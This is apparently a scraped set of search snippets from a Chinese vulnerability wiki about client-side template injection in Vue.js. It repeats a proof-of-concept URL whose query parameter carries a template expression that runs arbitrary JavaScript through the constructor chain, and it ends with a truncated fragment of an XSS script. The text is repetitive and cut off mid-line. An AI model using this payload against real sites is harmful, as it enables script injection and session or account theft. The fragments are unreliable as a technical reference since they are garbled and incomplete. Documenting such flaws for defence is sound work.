Vue.js Javascript library客户端模板注入漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , POC http://host/?name={{this.constructor.constructor('alert("foo")')()}} 免费、自由、人人可编辑的漏洞库- ...
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , POC http://host/?name={{this.constructor.constructor('alert("foo")')()}} 免费、自由、人人可编辑的漏洞库- ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , XSS1 <script> setInterval(() => { window.postMessage({ vueDetected: true, vueToas ...